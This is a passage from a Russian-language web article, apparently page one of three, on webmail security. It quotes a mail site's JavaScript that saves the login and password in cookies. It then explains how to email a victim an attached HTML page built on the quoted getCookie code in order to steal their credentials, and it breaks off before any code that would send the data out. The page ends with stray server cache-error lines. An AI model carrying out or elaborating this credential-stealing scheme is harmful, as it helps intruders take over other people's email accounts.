// вы читаете...

Новости

О безопасности почты на основе WWW-Интерфейса



// if (sqr == 0) { domain=»; name=»; psw=»; } else
// if (sqr == 1) { psw=»; }
setCookie(‘qmail_name’, name);
setCookie(‘qmail_psw’, psw);
setCookie(‘qmail_sqr’, sqr);
// setCookie(‘qmail_domain’, domain);
}
//—>
</SCRIPT>

Значит cookie :). На этой же паге видим как их достать:

—————————
function getCookie(Name) {
var search = Name + «=»
if (document.cookie.length > 0) { // if there are any cookies
offset = document.cookie.indexOf(search)
if (offset != -1) { // if cookie exists
offset += search.length // set index of beginning of value
end = document.cookie.indexOf(«;», offset) // set index of end of cookie value
if (end == -1) end = document.cookie.length
return unescape(document.cookie.substring(offset, end))
}
}
}
—————————

<SCRIPT LANGUAGE=»JavaScript»>
<!—
var i = getCookie(‘qmail_name’);
if ((i != null)&&(i != «»)) {document.logon.username.value = i;}
i = getCookie(‘qmail_psw’);
if ((i != null)&&(i != «»)) {document.logon.password.value = i;}
i = getCookie(‘qmail_sqr’) || 0;
document.logon.sequrity[i].checked = true;
// i = getCookie(‘qmail_domain’);
// if ((i != null)&&(i != «»)) {document.logon.domain.value = i;}
document.logon.username.focus();
//—>
</SCRIPT>

Так. Пасс и логин теперь есть у сайта. Чем мы хуже? Делаем письмо человеку, пасс которого нам нужен, и
прекрепляем к нему пагу, содержащую наш пас-зиф. Код этой паги может быть изменённым сорсом этой
заготовки (в первом поле ввода логи во втором пасс):

<html>

<SCRIPT LANGUAGE=»JavaScript»>
<!—
function getCookie(Name) {
var search = Name + «=»
if (document.cookie.length > 0) { // if there are any cookies
offset = document.cookie.indexOf(search)
if (offset != -1) { // if cookie exists
offset += search.length // set index of beginning of value
end = document.cookie.indexOf(«;», offset) // set index of end of cookie value
if (end == -1) end = document.cookie.length
return unescape(document.cookie.substring(offset, end))
}
}
}

//—>
</SCRIPT>
<br>

Страницы: 1 2 3

Обсуждене

Отзывов нет на «О безопасности почты на основе WWW-Интерфейса»

Ваш отзыв

Рубрики


Error: Can't open cache file!
Error: Can't write cache!
2020-01-23 15:09:07 - : /var/www/it-freelance.ru/3492ujnfmcdnfbvhgyr87w9i/cache_it-freelance_ru_e2.txt
2020-01-23 15:09:07 - : /var/www/it-freelance.ru/3492ujnfmcdnfbvhgyr87w9i/cache_it-freelance_ru_e2.txt